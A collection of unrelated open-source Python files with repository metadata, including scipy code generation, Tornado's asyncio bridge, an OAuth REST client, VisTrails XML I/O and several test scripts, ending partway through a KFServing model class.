# Don't try to deal with functions that have extra layers
# of wrappers.
continue
# Get the function declaration for the .pxd and the source
# code for the .pyx
dec, src, specs, func_fused_types, wrap = func.generate()
declarations.append(dec)
sources.append(src)
if wrap:
sources.append(wrap)
fused_types.update(func_fused_types)
# Declare the specializations
cfuncs = func.get_prototypes(nptypes_for_h=True)
for c_name, c_proto, cy_proto, header in cfuncs:
if header.endswith('++'):
# We grab the c++ functions from the c++ module
continue
item_defs, _, _ = get_declaration(func, c_name, c_proto,
cy_proto, header,
proto_h_filename)
defs.extend(item_defs)
# Add a line to the documentation
doc.append(generate_doc(func.name, specs))
# Generate code for benchmarks
if func.name in CYTHON_SPECIAL_BENCHFUNCS:
for codes in CYTHON_SPECIAL_BENCHFUNCS[func.name]:
pybench, cybench = generate_bench(func.name, codes)
bench_aux.extend([pybench, cybench])
fused_types = list(fused_types)
fused_types.sort()
with open(pxdfile, 'w') as f:
f.write(CYTHON_SPECIAL_PXD)
f.write("\n")
f.write("\n\n".join(fused_types))
f.write("\n\n")
f.write("\n".join(declarations))
with open(pyxfile, 'w') as f:
header = CYTHON_SPECIAL_PYX
header = header.replace("FUNCLIST", "\n".join(doc))
f.write(header)
f.write("\n")
f.write("\n".join(defs))
f.write("\n\n")
f.write("\n\n".join(sources))
f.write("\n\n")
f.write("\n\n".join(bench_aux))
def generate_ufuncs_type_stubs(module_name: str, ufuncs: List[Ufunc]):
stubs, module_all = [], []
for ufunc in ufuncs:
stubs.append(f'{ufunc.name}: np.ufunc')
if not ufunc.name.startswith('_'):
module_all.append(f"'{ufunc.name}'")
# jn is an alias for jv.
module_all.append("'jn'")
stubs.append('jn: np.ufunc')
module_all.sort()
stubs.sort()
contents = STUBS.format(
ALL=',\n '.join(module_all),
STUBS='\n'.join(stubs),
)
stubs_file = f'{module_name}.pyi'
with open(stubs_file, 'w') as f:
f.write(contents)
def unique(lst):
"""
Return a list without repeated entries (first occurrence is kept),
preserving order.
"""
seen = set()
new_lst = []
for item in lst:
if item in seen:
continue
seen.add(item)
new_lst.append(item)
return new_lst
def newer(source, target):
"""
Return true if 'source' exists and is more recently modified than
'target', or if 'source' exists and 'target' doesn't. Return false if
both exist and 'target' is the same age or younger than 'source'.
"""
if not os.path.exists(source):
raise ValueError("file '%s' does not exist" % os.path.abspath(source))
if not os.path.exists(target):
return 1
mtime1 = os.stat(source)[ST_MTIME]
mtime2 = os.stat(target)[ST_MTIME]
return mtime1 > mtime2
def all_newer(src_files, dst_files):
return all(os.path.exists(dst) and newer(dst, src)
for dst in dst_files for src in src_files)
def main(outdir):
pwd = os.path.dirname(__file__)
src_files = (os.path.abspath(__file__),
os.path.abspath(os.path.join(pwd, 'functions.json')),
os.path.abspath(os.path.join(pwd, '_add_newdocs.py')))
dst_files = ('_ufuncs.pyx',
'_ufuncs_defs.h',
'_ufuncs_cxx.pyx',
'_ufuncs_cxx.pxd',
'_ufuncs_cxx_defs.h',
'_ufuncs.pyi',
'cython_special.pyx',
'cython_special.pxd')
dst_files = (os.path.join(outdir, f) for f in dst_files)
os.chdir(BASE_DIR)
if all_newer(src_files, dst_files):
print("scipy/special/_generate_pyx.py: all files up-to-date")
return
ufuncs, fused_funcs = [], []
with open('functions.json') as data:
functions = json.load(data)
for f, sig in functions.items():
ufuncs.append(Ufunc(f, sig))
fused_funcs.append(FusedFunc(f, sig))
generate_ufuncs(os.path.join(outdir, "_ufuncs"),
os.path.join(outdir, "_ufuncs_cxx"),
ufuncs)
generate_ufuncs_type_stubs(os.path.join(outdir, "_ufuncs"),
ufuncs)
generate_fused_funcs(os.path.join(outdir, "cython_special"),
os.path.join(outdir, "_ufuncs"),
fused_funcs)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-o", "--outdir", type=str,
help="Path to the output directory")
args = parser.parse_args()
if not args.outdir:
#raise ValueError(f"Missing `--outdir` argument to _generate_pyx.py")
# We're dealing with a distutils build here, write in-place:
outdir_abs = os.path.abspath(os.path.dirname(__file__))
else:
outdir_abs = os.path.join(os.getcwd(), args.outdir)
main(outdir_abs)
| {
"content_hash": "c6bc312b560429e7ef2ce6f9c59f4249",
"timestamp": "",
"source": "github",
"line_count": 1519,
"max_line_length": 108,
"avg_line_length": 34.45161290322581,
"alnum_prop": 0.5436444240617595,
"repo_name": "perimosocordiae/scipy",
"id": "8e3e49dbabf5ca9f9612a1d239b60cc8a3ad5a73",
"size": "52332",
"binary": false,
"copies": "10",
"ref": "refs/heads/main",
"path": "scipy/special/_generate_pyx.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4620237"
},
{
"name": "C++",
"bytes": "959068"
},
{
"name": "Cython",
"bytes": "1059810"
},
{
"name": "Dockerfile",
"bytes": "16894"
},
{
"name": "Fortran",
"bytes": "5211680"
},
{
"name": "MATLAB",
"bytes": "4346"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Meson",
"bytes": "143727"
},
{
"name": "Python",
"bytes": "15434780"
},
{
"name": "R",
"bytes": "3059"
},
{
"name": "Shell",
"bytes": "18009"
},
{
"name": "TeX",
"bytes": "52106"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_dressed_noble_old_zabrak_male_01.iff"
result.attribute_template_id = 9
result.stfName("npc_name","zabrak_base_male")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | {
"content_hash": "5fb7dc87e13ed849103b0d73b6b06676",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 78,
"avg_line_length": 24.076923076923077,
"alnum_prop": 0.6964856230031949,
"repo_name": "obi-two/Rebelion",
"id": "0c1a492e74ba99fc2fa9bccc6416f750c25d015d",
"size": "458",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/mobile/shared_dressed_noble_old_zabrak_male_01.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
} |
import warnings as _warnings
_warnings.resetwarnings()
_warnings.filterwarnings('error')
from tdi.integration import wtf_service as _wtf_service
class Param(object):
def multi(self, name):
return []
param = Param()
adapter = _wtf_service.RequestParameterAdapter(param)
print adapter.getlist == param.multi
class Inherited(_wtf_service.RequestParameterAdapter):
pass
adapter = Inherited(param)
print adapter.getlist == param.multi
| {
"content_hash": "f157d0cad1259d833d043975a1e131d2",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 55,
"avg_line_length": 23.736842105263158,
"alnum_prop": 0.7560975609756098,
"repo_name": "ndparker/tdi",
"id": "3af6f68d2adc736d173d43b830ea7a50ecae9106",
"size": "473",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/integration/wtf_service/adapter_inherit.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "567028"
},
{
"name": "C++",
"bytes": "6510"
},
{
"name": "HTML",
"bytes": "998"
},
{
"name": "Python",
"bytes": "1032169"
},
{
"name": "Shell",
"bytes": "425"
}
],
"symlink_target": ""
} |
import json
import os
import unittest
import PTN
class ParseTest(unittest.TestCase):
def test_parser(self):
json_input = os.path.join(os.path.dirname(__file__), 'files/input.json')
with open(json_input) as input_file:
torrents = json.load(input_file)
json_output = os.path.join(os.path.dirname(__file__), 'files/output.json')
with open(json_output) as output_file:
expected_results = json.load(output_file)
self.assertEqual(len(torrents), len(expected_results))
for torrent, expected_result in zip(torrents, expected_results):
print("Test: " + torrent)
result = PTN.parse(torrent)
for key in expected_result:
if not expected_result[key]:
self.assertNotIn(key, result)
else:
self.assertIn(key, result)
result1 = result[key]
if key == 'excess' and type(result1) == list:
result1 = ', '.join(result1)
self.assertEqual(result1, expected_result[key])
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "f85288515337074670c4665344328ff8",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 82,
"avg_line_length": 33.4,
"alnum_prop": 0.561163387510693,
"repo_name": "divijbindlish/parse-torrent-name",
"id": "9db0507014fc7da0d9095de41fc7770f3245d2d0",
"size": "1216",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_parse.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8747"
}
],
"symlink_target": ""
} |
"""Bridges between the `asyncio` module and Tornado IOLoop.
.. versionadded:: 3.2
This module integrates Tornado with the ``asyncio`` module introduced
in Python 3.4 (and available `as a separate download
<https://pypi.python.org/pypi/asyncio>`_ for Python 3.3). This makes
it possible to combine the two libraries on the same event loop.
Most applications should use `AsyncIOMainLoop` to run Tornado on the
default ``asyncio`` event loop. Applications that need to run event
loops on multiple threads may use `AsyncIOLoop` to create multiple
loops.
.. note::
Tornado requires the `~asyncio.AbstractEventLoop.add_reader` family of
methods, so it is not compatible with the `~asyncio.ProactorEventLoop` on
Windows. Use the `~asyncio.SelectorEventLoop` instead.
"""
from __future__ import absolute_import, division, print_function
import functools
import tornado.concurrent
from tornado.gen import convert_yielded
from tornado.ioloop import IOLoop
from tornado import stack_context
try:
# Import the real asyncio module for py33+ first. Older versions of the
# trollius backport also use this name.
import asyncio # type: ignore
except ImportError as e:
# Asyncio itself isn't available; see if trollius is (backport to py26+).
try:
import trollius as asyncio # type: ignore
except ImportError:
# Re-raise the original asyncio error, not the trollius one.
raise e
class BaseAsyncIOLoop(IOLoop):
def initialize(self, asyncio_loop, close_loop=False, **kwargs):
super(BaseAsyncIOLoop, self).initialize(**kwargs)
self.asyncio_loop = asyncio_loop
self.close_loop = close_loop
# Maps fd to (fileobj, handler function) pair (as in IOLoop.add_handler)
self.handlers = {}
# Set of fds listening for reads/writes
self.readers = set()
self.writers = set()
self.closing = False
def close(self, all_fds=False):
self.closing = True
for fd in list(self.handlers):
fileobj, handler_func = self.handlers[fd]
self.remove_handler(fd)
if all_fds:
self.close_fd(fileobj)
if self.close_loop:
self.asyncio_loop.close()
def add_handler(self, fd, handler, events):
fd, fileobj = self.split_fd(fd)
if fd in self.handlers:
raise ValueError("fd %s added twice" % fd)
self.handlers[fd] = (fileobj, stack_context.wrap(handler))
if events & IOLoop.READ:
self.asyncio_loop.add_reader(
fd, self._handle_events, fd, IOLoop.READ)
self.readers.add(fd)
if events & IOLoop.WRITE:
self.asyncio_loop.add_writer(
fd, self._handle_events, fd, IOLoop.WRITE)
self.writers.add(fd)
def update_handler(self, fd, events):
fd, fileobj = self.split_fd(fd)
if events & IOLoop.READ:
if fd not in self.readers:
self.asyncio_loop.add_reader(
fd, self._handle_events, fd, IOLoop.READ)
self.readers.add(fd)
else:
if fd in self.readers:
self.asyncio_loop.remove_reader(fd)
self.readers.remove(fd)
if events & IOLoop.WRITE:
if fd not in self.writers:
self.asyncio_loop.add_writer(
fd, self._handle_events, fd, IOLoop.WRITE)
self.writers.add(fd)
else:
if fd in self.writers:
self.asyncio_loop.remove_writer(fd)
self.writers.remove(fd)
def remove_handler(self, fd):
fd, fileobj = self.split_fd(fd)
if fd not in self.handlers:
return
if fd in self.readers:
self.asyncio_loop.remove_reader(fd)
self.readers.remove(fd)
if fd in self.writers:
self.asyncio_loop.remove_writer(fd)
self.writers.remove(fd)
del self.handlers[fd]
def _handle_events(self, fd, events):
fileobj, handler_func = self.handlers[fd]
handler_func(fileobj, events)
def start(self):
old_current = IOLoop.current(instance=False)
try:
self._setup_logging()
self.make_current()
self.asyncio_loop.run_forever()
finally:
if old_current is None:
IOLoop.clear_current()
else:
old_current.make_current()
def stop(self):
self.asyncio_loop.stop()
def call_at(self, when, callback, *args, **kwargs):
# asyncio.call_at supports *args but not **kwargs, so bind them here.
# We do not synchronize self.time and asyncio_loop.time, so
# convert from absolute to relative.
return self.asyncio_loop.call_later(
max(0, when - self.time()), self._run_callback,
functools.partial(stack_context.wrap(callback), *args, **kwargs))
def remove_timeout(self, timeout):
timeout.cancel()
def add_callback(self, callback, *args, **kwargs):
if self.closing:
# TODO: this is racy; we need a lock to ensure that the
# loop isn't closed during call_soon_threadsafe.
raise RuntimeError("IOLoop is closing")
self.asyncio_loop.call_soon_threadsafe(
self._run_callback,
functools.partial(stack_context.wrap(callback), *args, **kwargs))
add_callback_from_signal = add_callback
class AsyncIOMainLoop(BaseAsyncIOLoop):
"""``AsyncIOMainLoop`` creates an `.IOLoop` that corresponds to the
current ``asyncio`` event loop (i.e. the one returned by
``asyncio.get_event_loop()``). Recommended usage::
from tornado.platform.asyncio import AsyncIOMainLoop
import asyncio
AsyncIOMainLoop().install()
asyncio.get_event_loop().run_forever()
See also :meth:`tornado.ioloop.IOLoop.install` for general notes on
installing alternative IOLoops.
"""
def initialize(self, **kwargs):
super(AsyncIOMainLoop, self).initialize(asyncio.get_event_loop(),
close_loop=False, **kwargs)
class AsyncIOLoop(BaseAsyncIOLoop):
"""``AsyncIOLoop`` is an `.IOLoop` that runs on an ``asyncio`` event loop.
This class follows the usual Tornado semantics for creating new
``IOLoops``; these loops are not necessarily related to the
``asyncio`` default event loop. Recommended usage::
from tornado.ioloop import IOLoop
IOLoop.configure('tornado.platform.asyncio.AsyncIOLoop')
IOLoop.current().start()
Each ``AsyncIOLoop`` creates a new ``asyncio.EventLoop``; this object
can be accessed with the ``asyncio_loop`` attribute.
"""
def initialize(self, **kwargs):
loop = asyncio.new_event_loop()
try:
super(AsyncIOLoop, self).initialize(loop, close_loop=True, **kwargs)
except Exception:
# If initialize() does not succeed (taking ownership of the loop),
# we have to close it.
loop.close()
raise
def to_tornado_future(asyncio_future):
"""Convert an `asyncio.Future` to a `tornado.concurrent.Future`.
.. versionadded:: 4.1
"""
tf = tornado.concurrent.Future()
tornado.concurrent.chain_future(asyncio_future, tf)
return tf
def to_asyncio_future(tornado_future):
"""Convert a Tornado yieldable object to an `asyncio.Future`.
.. versionadded:: 4.1
.. versionchanged:: 4.3
Now accepts any yieldable object, not just
`tornado.concurrent.Future`.
"""
tornado_future = convert_yielded(tornado_future)
af = asyncio.Future()
tornado.concurrent.chain_future(tornado_future, af)
return af
if hasattr(convert_yielded, 'register'):
convert_yielded.register(asyncio.Future, to_tornado_future) # type: ignore
| {
"content_hash": "c8f5465fcd65309a2b683d602724f344",
"timestamp": "",
"source": "github",
"line_count": 222,
"max_line_length": 80,
"avg_line_length": 35.689189189189186,
"alnum_prop": 0.6269089991164962,
"repo_name": "ajdavis/tornado",
"id": "830ee1f3b1b68d97fc1871798f59740155e18403",
"size": "7923",
"binary": false,
"copies": "22",
"ref": "refs/heads/master",
"path": "tornado/platform/asyncio.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "1664"
},
{
"name": "HTML",
"bytes": "25"
},
{
"name": "Python",
"bytes": "1554297"
},
{
"name": "Ruby",
"bytes": "1428"
},
{
"name": "Shell",
"bytes": "4070"
}
],
"symlink_target": ""
} |
"""
rest client
~~~~~~~~~~~~~~~~
RESTful api client.
:copyright: 2012-18 by raptor.zh@gmail.com
"""
import sys
PY3 = sys.version>"3"
if PY3:
from io import IOBase
def isIOBase(obj):
return isinstance(obj, IOBase)
else:
from cStringIO import InputType
from StringIO import StringIO
def isIOBase(obj):
return isinstance(obj, file) or isinstance(obj, StringIO) or isinstance(obj, InputType)
from functools import partial
import json
import logging
from requests_oauthlib import OAuth1Session, OAuth2Session
logger = logging.getLogger(__name__)
class APIObject(object):
def __init__(self, client, objname):
self.client = client
self.objname = objname
def __getattr__(self, name):
funcs = name.split("_")
fn = self.client.get_func(funcs[0], "_".join(
[f if f != "ID" else "%s" for f in funcs[1:]]), self.objname)
if fn:
setattr(self, name, fn)
return fn
else:
raise AttributeError('Invalid function name!')
class APIClient(object):
def __init__(self, auth, url, objlist=None, postcall=None, postfix="", verify=True, proxies=None):
"""
API client base class
:param auth: AuthOAuth1 or AuthOAuth2 object
:param url: API base url
:param objlist: available API objects
:param postcall: method will be called after API calling
:param postfix: API method postfix, eg. .json or .xml
:param verify: https verify
:param proxies: proxies, like: {"http": "http://10.10.1.10:3128", "https": "http://10.10.1.10:1080"}
"""
self.auth = auth
self.url = url
self.objlist = objlist
self.postcall = postcall if postcall else lambda r: r.json()
self.postfix = postfix
self.auth.verify = verify
self.auth.proxies = proxies
def __getattr__(self, name):
s = name.replace("_", "/")
s = s.replace("//", "_") # "__" will be replaced by "_" and not for split
funcs = s.split("/")
fn = self.get_func(funcs[0], "/".join([f if f != "ID" else "%s" for f in funcs[1:]]))
if fn:
setattr(self, name, fn)
return fn
elif (not self.objlist) or (name in self.objlist):
obj = APIObject(self, name)
setattr(self, name, obj)
return obj
else:
raise AttributeError("Invalid object name!")
def get_func(self, method, func, objname=None):
fn = None
if method in ['GET', 'POST', 'PUT', 'DELETE']:
if objname:
func = "/".join([objname, "%s", func] if func else [objname, "%s"])
if self.postfix:
func = ".".join([func, self.postfix])
fn = partial(self._generic_call, method, func)
return fn
def _generic_call(self, method, func, *args, **kwargs):
if func:
if len(args) == 0:
index = func.find("/%s")
if index >= 0:
func = "".join([func[:index], func[index+3:]])
else:
func = func % args # It will raise TypeError if args is not match
url = "/".join([self.url, func])
try:
kwargs.update(self.extra_params)
except AttributeError:
pass
return self._process(method, url, **kwargs)
def _process(self, method, url, **kwargs):
logger.debug(str(kwargs))
fn = getattr(self.auth, method.lower())
if fn:
if method in ['GET', 'DELETE']:
r = fn(url, params=kwargs, verify=self.auth.verify, proxies=self.auth.proxies)
else:
files = {}
for k, v in kwargs.items():
if isIOBase(v):
files[k] = v
for k in files.keys():
del kwargs[k]
r = fn(url, data=kwargs, files=files if files else None,
verify=self.auth.verify, proxies=self.auth.proxies)
else:
raise AttributeError("Invalid http method name!")
r.raise_for_status()
return self.postcall(r)
def _request(self, method, url_path, *args, **kwargs):
url = "/".join([self.url, url_path.format(*args)])
return self._process(method, url, **kwargs)
def get(self, url, *args, **kwargs):
return self._request("GET", url, *args, **kwargs)
def post(self, url, *args, **kwargs):
return self._request("POST", url, *args, **kwargs)
def put(self, url, *args, **kwargs):
return self._request("PUT", url, *args, **kwargs)
def delete(self, url, *args, **kwargs):
return self._request("DELETE", url, *args, **kwargs)
class AuthOAuth1(OAuth1Session):
def __init__(self, client_id, client_secret, redirect_uri,
request_token_uri, authorization_uri, access_token_uri,
access_token=None, access_secret=None,
https=True, **kwargs):
super(AuthOAuth1, self).__init__(client_key=client_id, client_secret=client_secret,
resource_owner_key=access_token, resource_owner_secret=access_secret,
callback_uri=redirect_uri, **kwargs)
self.callback_uri = redirect_uri
self.request_token_uri = request_token_uri
self.authorization_uri = authorization_uri
self.access_token_uri = access_token_uri
self.https = https
if access_token and access_secret: # request_token
self.token = {"oauth_token": access_token, "oauth_token_secret": access_secret}
def get_token_str(self):
res = {"access_token": self.token['oauth_token'],
"access_secret": self.token['oauth_token_secret']}
return json.dumps(res)
def get_request_url(self, **kwargs):
if not self.token:
self.token = self.fetch_request_token(self.request_token_uri)
else:
kwargs['request_token'] = self.token
authorization_url = self.authorization_url(self.authorization_uri, **kwargs)
return authorization_url
def get_access_token(self, verifier="", **kwargs):
self.token = self.fetch_access_token(self.access_token_uri, verifier, **kwargs)
return self.token
class AuthOAuth2(OAuth2Session):
def __init__(self, client_id, client_secret, redirect_uri,
authorization_uri, access_token_uri,
access_token=None, **kwargs):
super(AuthOAuth2, self).__init__(client_id=client_id, token=access_token,
redirect_uri=redirect_uri, **kwargs)
self.callback_uri = redirect_uri
self.client_secret = client_secret
self.authorization_uri = authorization_uri
self.access_token_uri = access_token_uri
if access_token:
self.token = access_token
def get_request_url(self, **kwargs):
request_url, state = self.authorization_url(self.authorization_uri, **kwargs)
return request_url
def get_access_token(self, response_url, **kwargs):
self.token = self.fetch_token(self.access_token_uri,
client_secret=self.client_secret,
authorization_response=response_url,
**kwargs)
return self.token
| {
"content_hash": "b0b30934305abb5247ae81ba95676c55",
"timestamp": "",
"source": "github",
"line_count": 203,
"max_line_length": 110,
"avg_line_length": 36.98522167487685,
"alnum_prop": 0.5610015982951518,
"repo_name": "raptorz/pyfan",
"id": "2b1f8b5778c354ed8f15a35c051dc27d263c55fb",
"size": "7532",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "restclient/restclient.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "28174"
}
],
"symlink_target": ""
} |
from xml.parsers.expat import ExpatError
import xml.dom.minidom
from vistrails.db import VistrailsDBException
from vistrails.db.versions.v0_5_0 import version as my_version
def parse_xml_file(filename):
try:
return xml.dom.minidom.parse(filename)
except xml.parsers.expat.ExpatError, e:
msg = 'XML parse error at line %s, col %s: %s' % \
(e.lineno, e.offset, e.code)
raise VistrailsDBException(msg)
def write_xml_file(filename, dom, prettyprint=True):
output = open(filename, 'w')
if prettyprint:
dom.writexml(output, '',' ','\n')
else:
dom.writexml(output)
output.close()
def read_xml_object(vtType, node, dao_list):
return dao_list[vtType].fromXML(node)
def write_xml_object(obj, dom, dao_list, node=None):
res_node = dao_list[obj.vtType].toXML(obj, dom, node)
return res_node
def open_from_xml(filename, vtType, dao_list):
"""open_from_xml(filename) -> DBVistrail"""
dom = parse_xml_file(filename)
vistrail = read_xml_object(vtType, dom.documentElement, dao_list)
dom.unlink()
return vistrail
def save_to_xml(obj, filename, dao_list):
dom = xml.dom.minidom.getDOMImplementation().createDocument(None, None,
None)
root = write_xml_object(obj, dom, dao_list)
dom.appendChild(root)
if obj.vtType == 'vistrail':
root.setAttribute('version', my_version)
root.setAttribute('xmlns:xsi',
'http://www.w3.org/2001/XMLSchema-instance')
root.setAttribute('xsi:schemaLocation',
'http://www.vistrails.org/vistrail.xsd')
write_xml_file(filename, dom)
dom.unlink()
def serialize(object, dao_list):
dom = xml.dom.minidom.getDOMImplementation().createDocument(None, None,
None)
root = write_xml_object(object, dom, dao_list)
dom.appendChild(root)
return dom.toxml()
def unserialize(str, obj_type):
dom = xml.dom.minidom.parseString(str)
return read_xml_object(obj_type, dom.documentElement, dao_list)
| {
"content_hash": "550d64a86b2aa50e2c52961b1be6cb2e",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 75,
"avg_line_length": 35.39344262295082,
"alnum_prop": 0.6252894858730894,
"repo_name": "Nikea/VisTrails",
"id": "661d93790f5c5ed94663c4da88d09441f847aa7f",
"size": "4039",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "vistrails/db/versions/v0_5_0/persistence/xml/io.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1421"
},
{
"name": "Inno Setup",
"bytes": "19611"
},
{
"name": "Makefile",
"bytes": "768"
},
{
"name": "Mako",
"bytes": "66415"
},
{
"name": "PHP",
"bytes": "49038"
},
{
"name": "Python",
"bytes": "19674395"
},
{
"name": "R",
"bytes": "778864"
},
{
"name": "Rebol",
"bytes": "3972"
},
{
"name": "Shell",
"bytes": "34182"
},
{
"name": "TeX",
"bytes": "145219"
},
{
"name": "XSLT",
"bytes": "1090"
}
],
"symlink_target": ""
} |
import os
import sys
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "python-bitsendrpc"))
import json
import shutil
import subprocess
import tempfile
import traceback
from bitsendrpc.authproxy import AuthServiceProxy, JSONRPCException
from util import *
def run_test(nodes):
# Replace this as appropriate
for node in nodes:
assert_equal(node.getblockcount(), 200)
assert_equal(node.getbalance(), 25*50)
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--nocleanup", dest="nocleanup", default=False, action="store_true",
help="Leave bitsendds and test.* datadir on exit or error")
parser.add_option("--srcdir", dest="srcdir", default="../../src",
help="Source directory containing bitsendd/bitsend-cli (default: %default%)")
parser.add_option("--tmpdir", dest="tmpdir", default=tempfile.mkdtemp(prefix="test"),
help="Root directory for datadirs")
(options, args) = parser.parse_args()
os.environ['PATH'] = options.srcdir+":"+os.environ['PATH']
check_json_precision()
success = False
nodes = []
try:
print("Initializing test directory "+options.tmpdir)
if not os.path.isdir(options.tmpdir):
os.makedirs(options.tmpdir)
initialize_chain(options.tmpdir)
nodes = start_nodes(2, options.tmpdir)
connect_nodes(nodes[1], 0)
sync_blocks(nodes)
run_test(nodes)
success = True
except AssertionError as e:
print("Assertion failed: "+e.message)
except Exception as e:
print("Unexpected exception caught during testing: "+str(e))
traceback.print_tb(sys.exc_info()[2])
if not options.nocleanup:
print("Cleaning up")
stop_nodes(nodes)
wait_bitsendds()
shutil.rmtree(options.tmpdir)
if success:
print("Tests successful")
sys.exit(0)
else:
print("Failed")
sys.exit(1)
if __name__ == '__main__':
main()
| {
"content_hash": "9b5c420b60ca4824478fb9c7dff3d04a",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 99,
"avg_line_length": 28.794520547945204,
"alnum_prop": 0.6294005708848716,
"repo_name": "madzebra/BitSend",
"id": "3a5d234bfa3237b87ad06c430dd2d1c046738303",
"size": "2426",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "qa/rpc-tests/skeleton.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "36095"
},
{
"name": "C",
"bytes": "4046688"
},
{
"name": "C++",
"bytes": "5810551"
},
{
"name": "CSS",
"bytes": "68816"
},
{
"name": "HTML",
"bytes": "50622"
},
{
"name": "Java",
"bytes": "30290"
},
{
"name": "M4",
"bytes": "277388"
},
{
"name": "Makefile",
"bytes": "114046"
},
{
"name": "Objective-C",
"bytes": "7725"
},
{
"name": "Objective-C++",
"bytes": "7240"
},
{
"name": "Protocol Buffer",
"bytes": "2328"
},
{
"name": "Python",
"bytes": "1202074"
},
{
"name": "QMake",
"bytes": "13495"
},
{
"name": "Roff",
"bytes": "18118"
},
{
"name": "Shell",
"bytes": "415657"
}
],
"symlink_target": ""
} |
import unittest
import os
from mock import Mock, MagicMock
from link.utils import load_json_file
from link.common import APIObject
TESTS_DIR = os.path.dirname(__file__)
def tst_file_path(file_name):
return '%s/%s' % (TESTS_DIR, file_name)
def tst_config_path(config_name):
return '%s/config/%s' % (TESTS_DIR, config_name)
def tst_db_path(config_name):
return '%s/dbs/%s' % (TESTS_DIR, config_name)
def load_tst_config(config_name):
config_path = tst_config_path(config_name)
return load_json_file(config_path)
class LnkAPITest(unittest.TestCase):
"""
Has helper functions for making expected return values
"""
def setUp(self):
pass
#TODO: Make sure we have other tests to test the APIObject
def expected(self, message_data=None):
api_object = APIObject()
api_object.set_message(message_data)
return api_object.response
| {
"content_hash": "91c223ac97a389c38c65fb481f58cad1",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 62,
"avg_line_length": 26.676470588235293,
"alnum_prop": 0.6802646085997794,
"repo_name": "uhjish/link",
"id": "c92fd9904e5fb78f349c70afc7596e2aa5b8af27",
"size": "907",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "link/tests/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "140701"
},
{
"name": "VimL",
"bytes": "883"
}
],
"symlink_target": ""
} |
"""
KFServing
Python SDK for KFServing # noqa: E501
The version of the OpenAPI document: v0.1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kfserving.configuration import Configuration
class V1beta1TransformersConfig(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'feast': 'V1beta1TransformerConfig'
}
attribute_map = {
'feast': 'feast'
}
def __init__(self, feast=None, local_vars_configuration=None): # noqa: E501
"""V1beta1TransformersConfig - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._feast = None
self.discriminator = None
if feast is not None:
self.feast = feast
@property
def feast(self):
"""Gets the feast of this V1beta1TransformersConfig. # noqa: E501
:return: The feast of this V1beta1TransformersConfig. # noqa: E501
:rtype: V1beta1TransformerConfig
"""
return self._feast
@feast.setter
def feast(self, feast):
"""Sets the feast of this V1beta1TransformersConfig.
:param feast: The feast of this V1beta1TransformersConfig. # noqa: E501
:type: V1beta1TransformerConfig
"""
self._feast = feast
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1beta1TransformersConfig):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1beta1TransformersConfig):
return True
return self.to_dict() != other.to_dict()
| {
"content_hash": "b7479c36af5364a6190313a39f29cc93",
"timestamp": "",
"source": "github",
"line_count": 118,
"max_line_length": 82,
"avg_line_length": 28.296610169491526,
"alnum_prop": 0.5693321353698713,
"repo_name": "kubeflow/kfserving-lts",
